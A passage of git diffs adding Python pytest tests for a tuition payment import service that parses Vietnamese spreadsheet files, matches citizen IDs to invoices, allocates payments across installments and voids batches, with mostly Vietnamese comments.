+        # Review #9: cột "Đã ghi (đồng)" = VND nguyên (KHÔNG đuôi '.00' của Numeric(15,2)).
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="committed",
+            raw={pis.COL_CCCD: "001234567890"},
+            row_status="matched",
+            payment_ids=[101],
+            amount="1000000",
+        )
+        content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        assert "1000000" in text
+        assert "1000000.00" not in text  # không lọt đuôi .00
+
+    async def test_build_result_file_committed_error_label(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Review #10: lô committed + dòng ERROR (TOCTOU) → nhãn "Lỗi (không ghi)",
+        # KHÔNG "Đã ghi" (chống lừa P2 cho nhánh error).
+        batch = await _mk_batch_with_row(
+            db,
+            creator_id=admin_user.id,
+            status="committed",
+            raw={pis.COL_CCCD: "001234567890"},
+            row_status="error",
+            payment_ids=[],
+            amount="1000000",
+        )
+        content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
+        text = content.decode("utf-8")
+        assert "Lỗi (không ghi)" in text

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1595,6 +1595,140 @@ class TestVoidBatch:
         await db.commit()
         return batch_id
 
+    async def _seed_sts10(self, db):
+        from app.services.lead_admission_sync import TUITION_PAID_STATUS
+
+        db.add(
+            models.ConsultationStatus(
+                id=TUITION_PAID_STATUS,
+                name="Đã đóng học phí",
+                color_code="#00aa00",
+                stage_id="stg01",
+            )
+        )
+        await db.flush()
+        return TUITION_PAID_STATUS
+
+    async def test_void_reverts_lead_from_sts10(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Void lô đã đẩy lead sts10 → LÙI lead về status TRƯỚC (đối xứng forward sync).
+        sts10 = await self._seed_sts10(db)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        prof = (await db.execute(select(models.AdmissionProfile))).scalars().first()
+        lead_id = prof.lead_id
+        orig = seeded_dependencies["initial_status_id"]
+        await db.commit()
+
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        lead = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead.consultation_status_id == sts10  # tiền đề: forward đẩy sts10
+
+        await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None,
+            reason="ghi nhầm lô",
+        )
+        await db.commit()
+        lead2 = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead2.consultation_status_id == orig  # đã lùi về status cũ
+        # có bản ghi history audit cho lần lùi (sts10 → orig)
+        hist = (
+            (
+                await db.execute(
+                    select(models.LeadStatusHistory).where(
+                        models.LeadStatusHistory.lead_id == lead_id,
+                        models.LeadStatusHistory.old_consultation_status_id == sts10,
+                        models.LeadStatusHistory.new_consultation_status_id == orig,
+                    )
+                )
+            )
+            .scalars()
+            .all()
+        )
+        assert len(hist) >= 1
+
+    async def test_void_skips_lead_revert_when_advanced_past_sts10(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Lead đã chuyển tiếp khỏi sts10 (nhập học) → void KHÔNG kéo lùi pipeline.
+        sts10 = await self._seed_sts10(db)
+        db.add(
+            models.ConsultationStatus(
+                id="stsZZ", name="Đã nhập học", color_code="#123456",
+                stage_id="stg01",
+            )
+        )
+        await db.flush()
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        prof = (await db.execute(select(models.AdmissionProfile))).scalars().first()
+        lead_id = prof.lead_id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        lead = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead.consultation_status_id == sts10
+        lead.consultation_status_id = "stsZZ"  # giả lập chuyển tiếp sau khi đóng HP
+        await db.commit()
+
+        await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x",
+        )
+        await db.commit()
+        lead2 = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead2.consultation_status_id == "stsZZ"  # KHÔNG bị kéo lùi
+
+    async def test_void_hk2_does_not_touch_lead(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # batch HK2 → commit/void KHÔNG đụng pipeline lead (chỉ HK1 đẩy/lùi).
+        await self._seed_sts10(db)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(
+            db, seeded_dependencies, importer_id=admin_user.id, semester=2
+        )
+        batch_id = batch.id
+        prof = (await db.execute(select(models.AdmissionProfile))).scalars().first()
+        lead_id = prof.lead_id
+        orig = seeded_dependencies["initial_status_id"]
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+        lead = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead.consultation_status_id == orig  # HK2 → KHÔNG forward sts10
+
+        await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x",
+        )
+        await db.commit()
+        lead2 = (
+            await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
+        ).scalar_one()
+        assert lead2.consultation_status_id == orig  # void HK2 → KHÔNG revert
+
     async def test_void_reverses_payment(self, db, seeded_dependencies, admin_user):
         # §10 Void: đảo lô → trừ lại paid_amount, reverse transaction, recompute status
         batch_id = await self._commit_one(db, seeded_dependencies, admin_user.id)

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -546,7 +546,8 @@ class TestResolveValidate:
         assert "học phí" in res.rows[0].message
 
     async def test_only_draft_invoice_is_error(self, db, seeded_dependencies):
-        # Finding 12: đợt draft chưa phát hành → không payable → LỖI
+        # Finding 12: đợt draft chưa phát hành → không payable → LỖI.
+        # Message tách riêng nhánh 'nháp' (cần phát hành) — KHÔNG gộp 'hoặc đã thu đủ'.
         await _seed_tuition(
             db,
             seeded_dependencies,
@@ -557,7 +558,26 @@ class TestResolveValidate:
             db, [_draft("001234567890", "1000000")], 2026, 1, None
         )
         assert res.rows[0].status == ERROR
-        assert "chưa phát hành" in res.rows[0].message
+        assert "đợt còn nháp" in res.rows[0].message
+        assert "phát hành" in res.rows[0].message
+        assert "đã thu đủ" not in res.rows[0].message  # không còn gộp 2 ca
+
+    async def test_fully_paid_invoice_is_error_distinct_message(
+        self, db, seeded_dependencies
+    ):
+        # Hồ sơ đã đóng đủ (mọi đợt 'paid') → không payable → LỖI với message RIÊNG
+        # "học phí đã thu đủ" (phân biệt với nhánh 'đợt còn nháp').
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "paid", "10000000", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert res.rows[0].message == "học phí đã thu đủ"
 
     async def test_overpay_total_principal_is_error(self, db, seeded_dependencies):
         await _seed_tuition(
@@ -2104,3 +2124,167 @@ class TestResultFileAndDetail:
         content, _, _ = await pis.build_result_file(db, batch.id, "csv", None)
         text = content.decode("utf-8")
         assert "(không có hồ sơ)" in text
+
+
+# =============================================================================
+# Diễn tiến: kế toán thu nhiều lần + import nhiều lô cho 1 hồ sơ (kịch bản 06-25)
+# =============================================================================
+class TestMultiCollectionTimeline:
+    """Mô phỏng đúng diễn biến nghiệp vụ đã chốt: học phí HK1 chia 2 đợt (đợt 1
+    đã phát hành, đợt 2 còn nháp). Kế toán thu 3 lần → import 3 lô; lô tràn sang
+    đợt CHƯA phát hành bị chặn cho tới khi phát hành hóa đơn đợt đó."""
+
+    @pytest.fixture(autouse=True)
+    async def _infra(self, db):
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+
+    @staticmethod
+    def _file(amount: str) -> bytes:
+        return _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                ["012345678901", "Nguyễn Văn A", amount, "05/09/2026", "TM", "", ""],
+            ]
+        )
+
+    async def _import_commit(self, db, admin_id, amount):
+        batch, preview = await pis.preview_import(
+            db,
+            content=self._file(amount),
+            filename=f"thu_{amount}.csv",
+            academic_year=2026,
+            semester_no=1,
+            created_by_id=admin_id,
+            unit_id=None,
+        )
+        await db.commit()
+        result, _ = await pis.commit_batch(
+            db, batch_id=batch.id, importer_id=admin_id, unit_id=None
+        )
+        await db.commit()
+        return batch, preview, result
+
+    async def test_full_timeline_multi_collect_multi_import(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # --- Thiết lập: HK1 = 10tr = đợt1 6tr (issued) + đợt2 4tr (draft, CHƯA p.hành)
+        _profile, _fee, invs = await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="012345678901",
+            lead_name="Nguyễn Văn A",
+            invoices=[
+                (1, "6000000", "issued", "0", "0"),
+                (2, "4000000", "draft", "0", "0"),
+            ],
+        )
+        inv1_id, inv2_id, fee_id = invs[0].id, invs[1].id, _fee.id
+        await db.commit()
+
+        async def _state():
+            i1 = (
+                await db.execute(select(Invoice).where(Invoice.id == inv1_id))
+            ).scalar_one()
+            i2 = (
+                await db.execute(select(Invoice).where(Invoice.id == inv2_id))
+            ).scalar_one()
+            f = (
+                await db.execute(select(Fee).where(Fee.id == fee_id))
+            ).scalar_one()
+            return i1, i2, f
+
+        # === Lô #1: thu 3.5tr → vào đợt 1 (issued) ===
+        _, _, r1 = await self._import_commit(db, admin_user.id, "3.500.000")
+        assert r1.committed_count == 1 and r1.payment_count == 1
+        i1, i2, f = await _state()
+        assert i1.paid_amount == Decimal("3500000") and i1.status == "partial"
+        assert i2.status == "draft"  # đợt 2 vẫn nháp
+        assert f.paid_amount == Decimal("3500000")
+
+        # === Lô #2: thu 2.5tr → đóng nốt đợt 1 ===
+        _, _, r2 = await self._import_commit(db, admin_user.id, "2.500.000")
+        assert r2.committed_count == 1
+        i1, i2, f = await _state()
+        assert i1.paid_amount == Decimal("6000000") and i1.status == "paid"
+        assert f.paid_amount == Decimal("6000000")
+
+        # === Lô #3 (lần 1): thu 4tr — đợt 1 đã 'paid', đợt 2 còn 'draft' → KHÔNG có
+        #     hóa đơn payable → LỖI message 'đợt còn nháp' (KHÔNG ghi tiền) ===
+        batch3, preview3 = await pis.preview_import(
+            db,
+            content=self._file("4.000.000"),
+            filename="thu_4.000.000.csv",
+            academic_year=2026,
+            semester_no=1,
+            created_by_id=admin_user.id,
+            unit_id=None,
+        )
+        await db.commit()
+        assert preview3.rows[0].status == ERROR
+        assert "đợt còn nháp" in preview3.rows[0].message
+        _, _, f = await _state()
+        assert f.paid_amount == Decimal("6000000")  # chưa ghi thêm
+
+        # === Kế toán PHÁT HÀNH đợt 2 (draft → issued) ===
+        i2_lock = (
+            await db.execute(select(Invoice).where(Invoice.id == inv2_id))
+        ).scalar_one()
+        i2_lock.status = "issued"
+        await db.commit()
+
+        # === Lô #3 (lần 2): re-import CÙNG file 4tr → preview cũ bị THAY (replace) →
+        #     đợt 2 nay 'issued' → Khớp → commit → đóng đủ HK1 ===
+        _, preview3b, r3 = await self._import_commit(db, admin_user.id, "4.000.000")
+        assert preview3b.rows[0].status in (MATCHED, WARNED)
+        assert r3.committed_count == 1 and r3.payment_count == 1
+        i1, i2, f = await _state()
+        assert i2.paid_amount == Decimal("4000000") and i2.status == "paid"
+        assert f.paid_amount == Decimal("10000000") and f.status == "paid"
+
+        # Tổng 3 lô = 3 Payment = 10tr
+        pays = (await db.execute(select(Payment))).scalars().all()
+        assert len(pays) == 3
+        assert sum((p.amount for p in pays), Decimal("0")) == Decimal("10000000")
+
+    async def test_overpay_blocked_when_next_installment_not_issued(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Biên: đợt 1 còn 2.5tr, đợt 2 còn 'draft' → thu 5tr KHÔNG tràn sang đợt 2
+        # (đợt nháp không tính nợ khả thu) → LỖI 'vượt còn nợ gốc'.
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="012345678901",
+            lead_name="Nguyễn Văn A",
+            invoices=[
+                (1, "6000000", "partial", "3500000", "0"),
+                (2, "4000000", "draft", "0", "0"),
+            ],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("012345678901", "5000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "vượt" in res.rows[0].message
+
+    async def test_overflow_two_issued_installments_warns(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # Đối chứng: nếu đợt 2 ĐÃ phát hành (issued), thu 5tr tràn 2 đợt → WARNED
+        # (cảnh báo tràn nhiều đợt) — ghi được (khác hẳn ca đợt nháp ở trên).
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="012345678901",
+            lead_name="Nguyễn Văn A",
+            invoices=[
+                (1, "6000000", "partial", "3500000", "0"),
+                (2, "4000000", "issued", "0", "0"),
+            ],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("012345678901", "5000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == WARNED
+        assert len(res.rows[0].allocations) == 2  # 2.5tr đợt1 + 2.5tr đợt2

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1,0 +1,848 @@
+# tests/services/test_payment_import_service.py
+"""
+Tests for payment_import_service (BV-2): parse + resolve/validate + preview batch.
+
+Phủ:
+- Parse: VN-number, quantize 2 dp, ngày (text + chuỗi datetime Excel), CCCD giữ số 0
+  đầu (dtype=str), map hình thức, row_no = dòng bảng tính, bỏ dòng trống.
+- Resolve READ-ONLY: khớp/không thấy/fee cancelled/đợt draft/vượt tổng/FIFO nhiều
+  đợt/trùng-trong-file/lệch tên/IDOR/lead xóa mềm/CMND 9 số/principal-first (bỏ phạt).
+- create_preview_batch / preview_import: persist batch 'preview' + rows, CCCD lỗi →
+  citizen_id NULL, thay preview cũ cùng file, file đã committed → ConflictError.
+
+KHÔNG ghi Payment (đó là BV-3).
+"""
+import io
+import itertools
+from datetime import date, datetime, timezone
+from decimal import Decimal
+
+import pytest
+from sqlalchemy import select
+from sqlalchemy.ext.asyncio import AsyncSession
+
+from app import models
+from app.models.finance import (
+    Fee,
+    Invoice,
+    PaymentImportBatch,
+    PaymentImportBatchStatusEnum,
+    PaymentImportRow,
+    PaymentImportRowStatusEnum,
+)
+from app.services import payment_import_service as pis
+from app.utils.exceptions import BadRequest, ConflictError
+
+MATCHED = PaymentImportRowStatusEnum.matched.value
+WARNED = PaymentImportRowStatusEnum.warned.value
+ERROR = PaymentImportRowStatusEnum.error.value
+
+_phone_seq = itertools.count(1)
+
+
+# =============================================================================
+# Helpers
+# =============================================================================
+def _xlsx_bytes(rows: list) -> bytes:
+    """rows[0] = header; phần còn lại = dữ liệu (ô có thể là date/datetime thật)."""
+    from openpyxl import Workbook
+
+    wb = Workbook()
+    ws = wb.active
+    for r in rows:
+        ws.append(r)
+    buf = io.BytesIO()
+    wb.save(buf)
+    return buf.getvalue()
+
+
+def _csv_bytes(rows: list) -> bytes:
+    import csv
+
+    buf = io.StringIO()
+    w = csv.writer(buf)
+    for r in rows:
+        w.writerow(r)
+    return buf.getvalue().encode("utf-8")
+
+
+def _draft(
+    citizen_id,
+    amount,
+    *,
+    name="",
+    row_no=2,
+    method="cash",
+    reference="",
+    note="",
+    payment_date=None,
+    parse_error=None,
+) -> "pis.RowDraft":
+    return pis.RowDraft(
+        row_no=row_no,
+        citizen_id=citizen_id,
+        name=name,
+        amount=(Decimal(str(amount)) if amount is not None else None),
+        payment_date=payment_date or date(2026, 9, 5),
+        method_code=method,
+        reference=reference,
+        note=note,
+        raw={pis.COL_CCCD: citizen_id, pis.COL_AMOUNT: str(amount)},
+        parse_error=parse_error,
+    )
+
+
+async def _seed_tuition(
+    db: AsyncSession,
+    deps: dict,
+    *,
+    citizen_id: str,
+    invoices: list,  # [(installment_no, amount, status, paid, penalty)]
+    year: int = 2026,
+    semester: int = 1,
+    lead_name: str = "Nguyễn Văn An",
+    unit_id: int = None,
+    deleted_at: datetime = None,
+):
+    """Dựng chain Lead → AdmissionProfile(citizen_id) → Fee(tuition) → Invoice(s)."""
+    lead = models.Lead(
+        full_name=lead_name,
+        phone=f"09{next(_phone_seq):08d}",
+        source="bulk_test",
+        unit_id=unit_id or deps["unit_id"],
+        consultation_status_id=deps["initial_status_id"],
+        deleted_at=deleted_at,
+    )
+    db.add(lead)
+    await db.flush()
+
+    profile = models.AdmissionProfile(
+        lead_id=lead.id,
+        status="submitted",
+        academic_year=year,
+        applied_rules={},
+        citizen_id=citizen_id,
+    )
+    db.add(profile)
+    await db.flush()
+
+    fee = Fee(
+        admission_profile_id=profile.id,
+        fee_type="tuition",
+        academic_year=year,
+        semester_no=semester,
+        base_amount=Decimal("100000000"),
+        final_amount=Decimal("100000000"),
+        status="invoiced",
+    )
+    db.add(fee)
+    await db.flush()
+
+    inv_objs = []
+    for no, amount, st, paid, penalty in invoices:
+        inv = Invoice(
+            fee_id=fee.id,
+            invoice_number=f"INV-T-{citizen_id}-{no}",
+            installment_no=no,
+            amount=Decimal(str(amount)),
+            paid_amount=Decimal(str(paid)),
+            penalty_amount=Decimal(str(penalty)),
+            status=st,
+            due_date=date(year, 9, 5),
+        )
+        db.add(inv)
+        inv_objs.append(inv)
+    await db.flush()
+    return profile, fee, inv_objs
+
+
+# =============================================================================
+# Parse helpers (pure — no DB)
+# =============================================================================
+class TestParseAmount:
+    def test_thousands_dot_separator(self):
+        assert pis.parse_amount_vn("7.200.000") == Decimal("7200000")
+
+    def test_decimal_comma(self):
+        assert pis.parse_amount_vn("7.200.000,50") == Decimal("7200000.50")
+
+    def test_float_string_from_excel(self):
+        # "7200000.0" — nhóm cuối 1 chữ số → '.' là thập phân, không phải nghìn
+        assert pis.parse_amount_vn("7200000.0") == Decimal("7200000.00")
+
+    def test_quantize_three_decimals(self):
+        # Finding 4: >2 chữ số thập phân phải quantize về 2 dp (cột Numeric(15,2))
+        v = pis.parse_amount_vn("7.200.000,505")
+        assert v == Decimal("7200000.51")
+        assert v.as_tuple().exponent == -2
+
+    def test_rejects_zero(self):
+        with pytest.raises(ValueError):
+            pis.parse_amount_vn("0")
+
+    def test_rejects_negative(self):
+        with pytest.raises(ValueError):
+            pis.parse_amount_vn("-5000")
+
+    def test_rejects_garbage(self):
+        with pytest.raises(ValueError):
+            pis.parse_amount_vn("abc")
+
+    def test_nbsp_whitespace_separator(self):
+        # File ngân hàng/Excel: '7 200 000' với non-breaking space (NBSP   /
+        # narrow  ) — phải bỏ HẾT whitespace, không chỉ space thường.
+        assert pis.parse_amount_vn("7 200 000") == Decimal("7200000")
+        assert pis.parse_amount_vn("7 200 000") == Decimal("7200000")
+        assert pis.parse_amount_vn("7 200 000") == Decimal("7200000")
+
+
+class TestParseDate:
+    def test_vn_slash(self):
+        assert pis.parse_date_vn("05/09/2026") == date(2026, 9, 5)
+
+    def test_vn_dash(self):
+        assert pis.parse_date_vn("05-09-2026") == date(2026, 9, 5)
+
+    def test_iso(self):
+        assert pis.parse_date_vn("2026-09-05") == date(2026, 9, 5)
+
+    def test_excel_datetime_string(self):
+        # Finding 1: ô Date Excel đọc dtype=str → "2026-09-05 00:00:00" (kèm giờ)
+        assert pis.parse_date_vn("2026-09-05 00:00:00") == date(2026, 9, 5)
+
+    def test_excel_iso_t_separator(self):
+        assert pis.parse_date_vn("2026-09-05T00:00:00") == date(2026, 9, 5)
+
+    def test_empty_raises(self):
+        with pytest.raises(ValueError):
+            pis.parse_date_vn("")
+
+    def test_invalid_raises(self):
+        with pytest.raises(ValueError):
+            pis.parse_date_vn("hôm qua")
+
+    def test_two_digit_year_rejected(self):
+        # strptime %Y nuốt năm 2 số → 0026; phải chặn (BV-3 sẽ ghi Payment năm 0026).
+        with pytest.raises(ValueError):
+            pis.parse_date_vn("05/09/26")
+
+    def test_out_of_range_year_rejected(self):
+        with pytest.raises(ValueError):
+            pis.parse_date_vn("05/09/1999")
+
+
+# =============================================================================
+# parse_template (builds real files)
+# =============================================================================
+class TestParseTemplate:
+    def _header(self):
+        return pis.TEMPLATE_COLS
+
+    def test_cccd_leading_zero_preserved(self):
+        # CCCD text "001234567890" KHÔNG bị cắt thành 1234567890
+        content = _xlsx_bytes(
+            [
+                self._header(),
+                [
+                    "001234567890",
+                    "Nguyễn Văn An",
+                    "7.200.000",
+                    "05/09/2026",
+                    "TM",
+                    "",
+                    "",
+                ],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.xlsx")
+        assert len(drafts) == 1
+        assert drafts[0].citizen_id == "001234567890"
+        assert drafts[0].amount == Decimal("7200000")
+        assert drafts[0].parse_error is None
+
+    def test_excel_real_date_cell(self):
+        # Finding 1 (regression chính): ô Date THẬT của Excel → không false-error
+        content = _xlsx_bytes(
+            [
+                self._header(),
+                ["001234567890", "An", "7.200.000", date(2026, 9, 5), "CK", "", ""],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.xlsx")
+        assert drafts[0].parse_error is None
+        assert drafts[0].payment_date == date(2026, 9, 5)
+        assert drafts[0].method_code == "bank_transfer"
+
+    def test_method_mapping(self):
+        rows = [self._header()]
+        for m in ("TM", "CK", "Chuyển khoản", "tiền mặt"):
+            rows.append(["001234567890", "An", "1.000.000", "05/09/2026", m, "", ""])
+        drafts = pis.parse_template(_xlsx_bytes(rows), "f.xlsx")
+        assert [d.method_code for d in drafts] == [
+            "cash",
+            "bank_transfer",
+            "bank_transfer",
+            "cash",
+        ]
+
+    def test_invalid_method_sets_parse_error(self):
+        content = _xlsx_bytes(
+            [
+                self._header(),
+                ["001234567890", "An", "1.000.000", "05/09/2026", "Bitcoin", "", ""],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.xlsx")
+        assert drafts[0].method_code is None
+        assert "hình thức" in drafts[0].parse_error
+
+    def test_row_no_matches_spreadsheet_and_skips_blank(self):
+        # Finding 5: header = dòng 1; dòng trống bị bỏ; row_no khớp Excel
+        content = _xlsx_bytes(
+            [
+                self._header(),
+                ["", "", "", "", "", "", ""],  # dòng 2 — trống → bỏ
+                [
+                    "001234567890",
+                    "An",
+                    "1.000.000",
+                    "05/09/2026",
+                    "TM",
+                    "",
+                    "",
+                ],  # dòng 3
+            ]
+        )
+        drafts = pis.parse_template(content, "f.xlsx")
+        assert len(drafts) == 1
+        assert drafts[0].row_no == 3
+
+    def test_missing_required_column_raises(self):
+        content = _xlsx_bytes(
+            [
+                [pis.COL_CCCD, pis.COL_AMOUNT, pis.COL_DATE],  # thiếu "Hình thức"
+                ["001234567890", "1.000.000", "05/09/2026"],
+            ]
+        )
+        with pytest.raises(BadRequest):
+            pis.parse_template(content, "f.xlsx")
+
+    def test_csv_also_supported(self):
+        content = _csv_bytes(
+            [
+                self._header(),
+                [
+                    "001234567890",
+                    "An",
+                    "1.000.000",
+                    "05/09/2026",
+                    "TM",
+                    "PT-1",
+                    "ghi chú",
+                ],
+            ]
+        )
+        drafts = pis.parse_template(content, "f.csv")
+        assert drafts[0].citizen_id == "001234567890"
+        assert drafts[0].reference == "PT-1"
+
+
+# =============================================================================
+# resolve_and_validate (DB, READ-ONLY)
+# =============================================================================
+class TestBuildTemplate:
+    """Generator file mẫu (build_template) — pure, không qua DB."""
+
+    def test_csv_has_bom_and_parses_back(self):
+        content, media, fname = pis.build_template("csv")
+        assert content[:3] == b"\xef\xbb\xbf"  # BOM utf-8-sig cho Excel VN
+        assert fname.endswith(".csv")
+        drafts = pis.parse_template(content, "t.csv")
+        assert drafts[0].citizen_id == "001234567890"  # round-trip giữ số 0 đầu
+
+    def test_xlsx_parses_back_with_text_cccd(self):
+        content, media, fname = pis.build_template("xlsx")
+        assert fname.endswith(".xlsx")
+        assert "spreadsheet" in media
+        drafts = pis.parse_template(content, "t.xlsx")
+        assert len(drafts) == 1
+        assert drafts[0].citizen_id == "001234567890"
+        assert drafts[0].payment_date == date(2026, 9, 5)
+        assert drafts[0].method_code == "cash"
+
+    def test_xlsx_cccd_text_format_covers_full_range(self):
+        # Finding 3: number_format='@' phải phủ tới HẾT MAX_IMPORT_ROWS (không chỉ
+        # ~1000 dòng đầu) — nếu không file > N dòng mất số 0 đầu CCCD.
+        import io as _io
+
+        from openpyxl import load_workbook
+
+        content, _, _ = pis.build_template("xlsx")
+        ws = load_workbook(_io.BytesIO(content)).active
+        cccd_col = pis.TEMPLATE_COLS.index(pis.COL_CCCD) + 1
+        letter = ws.cell(row=1, column=cccd_col).column_letter
+        last = pis.MAX_IMPORT_ROWS + 1  # dòng dữ liệu cuối cùng
+        assert ws[f"{letter}{last}"].number_format == "@"
+
+    def test_default_format_is_xlsx(self):
+        _, _, fname = pis.build_template("")
+        assert fname.endswith(".xlsx")
+
+
+class TestResolveValidate:
+    async def test_matched_single_invoice(self, db, seeded_dependencies):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "10000000")], 2026, 1, None
+        )
+        row = res.rows[0]
+        assert row.status == MATCHED
+        assert res.matched_count == 1 and res.failed_count == 0
+        assert len(row.allocations) == 1
+        assert row.allocations[0].amount == Decimal("10000000")
+        assert res.total_amount == Decimal("10000000")
+
+    async def test_cccd_not_found(self, db, seeded_dependencies):
+        res = await pis.resolve_and_validate(
+            db, [_draft("009999999999", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "không tìm thấy" in res.rows[0].message
+
+    async def test_cmnd_9_digits_is_error(self, db, seeded_dependencies):
+        res = await pis.resolve_and_validate(
+            db, [_draft("123456789", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "12 chữ số" in res.rows[0].message
+
+    async def test_fee_cancelled_only_is_error(self, db, seeded_dependencies):
+        # Finding 3: fee cancelled vẫn giữ slot index → phải lọc status
+        _, fee, _ = await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        fee.status = "cancelled"
+        await db.flush()
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "học phí" in res.rows[0].message
+
+    async def test_only_draft_invoice_is_error(self, db, seeded_dependencies):
+        # Finding 12: đợt draft chưa phát hành → không payable → LỖI
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "draft", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "chưa phát hành" in res.rows[0].message
+
+    async def test_overpay_total_principal_is_error(self, db, seeded_dependencies):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "10000001")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "vượt tổng còn nợ" in res.rows[0].message
+
+    async def test_fifo_two_invoices_warns(self, db, seeded_dependencies):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[
+                (1, "4000000", "issued", "0", "0"),
+                (2, "6000000", "issued", "0", "0"),
+            ],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "7000000")], 2026, 1, None
+        )
+        row = res.rows[0]
+        assert row.status == WARNED
+        assert len(row.allocations) == 2
+        assert row.allocations[0].amount == Decimal("4000000")  # đợt 1 đầy trước
+        assert row.allocations[1].amount == Decimal("3000000")  # tràn 3tr sang đợt 2
+        assert "phân bổ" in row.message
+
+    async def test_duplicate_in_file_second_sees_reduced(self, db, seeded_dependencies):
+        # Finding 9: 2 dòng cùng CCCD+kỳ → dòng 2 thấy số dư đã trừ
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db,
+            [
+                _draft("001234567890", "6000000", row_no=2),
+                _draft("001234567890", "6000000", row_no=3),
+            ],
+            2026,
+            1,
+            None,
+        )
+        assert res.rows[0].status == MATCHED
+        assert res.rows[1].status == ERROR  # 6tr > 4tr còn lại
+        assert "vượt tổng còn nợ" in res.rows[1].message
+
+    async def test_name_mismatch_warns(self, db, seeded_dependencies):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            lead_name="Nguyễn Văn An",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000", name="Trần Thị Bích")], 2026, 1, None
+        )
+        row = res.rows[0]
+        assert row.status == WARNED
+        assert "tên lệch" in row.message
+
+    async def test_principal_first_ignores_penalty(self, db, seeded_dependencies):
+        # Finding 8: principal_rem = amount − paid (KHÔNG ăn penalty).
+        # invoice amount=10tr, penalty=1tr → remaining_amount(property)=11tr nhưng
+        # bulk chỉ tính 10tr gốc.
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
